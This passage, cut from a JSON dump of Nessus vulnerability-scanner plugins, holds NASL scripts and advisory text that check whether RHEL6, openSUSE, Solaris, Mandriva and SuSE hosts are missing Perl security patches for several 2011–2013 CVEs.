reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"perl-debuginfo-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"perl-devel-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"perl-libs-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-Archive-Extract / perl-Archive-Tar / perl-CGI / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T16:33:56", "description": "Perl was updated to fix 3 security issues :\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\nIn openSUSE 12.1 also the following non-security bug was fixed :\n\n - fix IPC::Open3 bug when '-' is used [bnc#755278]", "edition": 22, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : perl (openSUSE-SU-2013:0497-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:perl", "p-cpe:/a:novell:opensuse:perl-base", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:perl-base-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-base-32bit", "p-cpe:/a:novell:opensuse:perl-debugsource", "p-cpe:/a:novell:opensuse:perl-base-debuginfo", "p-cpe:/a:novell:opensuse:perl-32bit", "p-cpe:/a:novell:opensuse:perl-debuginfo-32bit", "p-cpe:/a:novell:opensuse:perl-debuginfo", "cpe:/o:novell:opensuse:12.2"], "id": "OPENSUSE-2013-225.NASL", "href": "https://www.tenable.com/plugins/nessus/74932", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-225.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74932);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56562, 56950, 58311);\n\n script_name(english:\"openSUSE Security Update : perl (openSUSE-SU-2013:0497-1)\");\n script_summary(english:\"Check for the openSUSE-2013-225 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Perl was updated to fix 3 security issues :\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\nIn openSUSE 12.1 also the following non-security bug was fixed :\n\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=755278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=797060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-03/msg00068.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-base-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1|SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1 / 12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-base-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-base-debuginfo-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-debuginfo-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"perl-debugsource-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.14.2-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-base-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-base-debuginfo-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-debuginfo-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"perl-debugsource-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.16.0-3.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-base-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-base-debuginfo-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-debuginfo-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"perl-debugsource-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-base-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-base-debuginfo-32bit-5.16.2-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"perl-debuginfo-32bit-5.16.2-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-32bit / perl / perl-base-32bit / perl-base / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T05:49:15", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Heap-based buffer overflow in the Perl_repeatcpy\n function in util.c in Perl 5.12.x before 5.12.5, 5.14.x\n before 5.14.3, and 5.15.x before 15.15.5 allows\n context-dependent attackers to cause a denial of service\n (memory consumption and crash) or possibly execute\n arbitrary code via the 'x' string repeat operator.\n (CVE-2012-5195)\n\n - CGI.pm module before 3.63 for Perl does not properly\n escape newlines in (1) Set-Cookie or (2) P3P headers,\n which might allow remote attackers to inject arbitrary\n headers into responses from applications that use\n CGI.pm. (CVE-2012-5526)\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. (CVE-2012-6329)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : perl-512 (cve_2012_5195_heap_buffer)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.1", "p-cpe:/a:oracle:solaris:perl-512"], "id": "SOLARIS11_PERL-512_20131017.NASL", "href": "https://www.tenable.com/plugins/nessus/80727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80727);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : perl-512 (cve_2012_5195_heap_buffer)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Heap-based buffer overflow in the Perl_repeatcpy\n function in util.c in Perl 5.12.x before 5.12.5, 5.14.x\n before 5.14.3, and 5.15.x before 15.15.5 allows\n context-dependent attackers to cause a denial of service\n (memory consumption and crash) or possibly execute\n arbitrary code via the 'x' string repeat operator.\n (CVE-2012-5195)\n\n - CGI.pm module before 3.63 for Perl does not properly\n escape newlines in (1) Set-Cookie or (2) P3P headers,\n which might allow remote attackers to inject arbitrary\n headers into responses from applications that use\n CGI.pm. (CVE-2012-5526)\n\n - The _compile function in Maketext.pm in the\n Locale::Maketext implementation in Perl before 5.17.7\n does not properly handle backslashes and fully qualified\n method names during compilation of bracket notation,\n which allows context-dependent attackers to execute\n arbitrary commands via crafted input to an application\n that accepts translation strings from users, as\n demonstrated by the TWiki application before 5.1.3, and\n the Foswiki application 1.0.x through 1.0.10 and 1.1.x\n through 1.1.6. (CVE-2012-6329)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.oracle.com/sunsecurity/cve-2012-5195-heap-buffer-overrun-vulnerability-in-perl\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-5526-configuration-vulnerability-in-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?975ebb1f\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-6329-code-injection-vulnerability-in-perl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0ed10ce\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11.1.7.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:perl-512\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^perl-512$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl-512\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.1.7.0.5.0\", sru:\"SRU 11.1.7.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : perl-512\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"perl-512\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:07", "description": "Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have bene pushed to main-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).", "edition": 28, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : perl (MDVSA-2013:113)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-6329"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:perl-base", "p-cpe:/a:mandriva:linux:perl-doc", "p-cpe:/a:mandriva:linux:perl-devel", "p-cpe:/a:mandriva:linux:perl", "p-cpe:/a:mandriva:linux:perl-Locale-Maketext"], "id": "MANDRIVA_MDVSA-2013-113.NASL", "href": "https://www.tenable.com/plugins/nessus/66125", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:113. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66125);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56950, 58311);\n script_xref(name:\"MDVSA\", value:\"2013:113\");\n script_xref(name:\"MGASA\", value:\"2012-0352\");\n script_xref(name:\"MGASA\", value:\"2013-0032\");\n script_xref(name:\"MGASA\", value:\"2013-0094\");\n\n script_name(english:\"Mandriva Linux Security Advisory : perl (MDVSA-2013:113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have bene pushed to main-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Locale-Maketext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-Locale-Maketext-1.220.0-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-base-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-devel-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-doc-5.14.2-8.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T12:53:12", "description": "This update of Perl 5 fixes the following security issues :\n\n - fix rehash DoS [bnc#804415] [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - fix glob denial of service [bnc#796014] [CVE-2011-2728]\n\n - sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n\n - make getgrent work with long group entries [bnc#788388]", "edition": 17, "published": "2013-03-13T00:00:00", "title": "SuSE 10 Security Update : Perl (ZYPP Patch Number 8479)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "modified": "2013-03-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_PERL-8479.NASL", "href": "https://www.tenable.com/plugins/nessus/65249", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65249);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2011-2728\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n\n script_name(english:\"SuSE 10 Security Update : Perl (ZYPP Patch Number 8479)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of Perl 5 fixes the following security issues :\n\n - fix rehash DoS [bnc#804415] [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - fix glob denial of service [bnc#796014] [CVE-2011-2728]\n\n - sanitize input in Maketext.pm 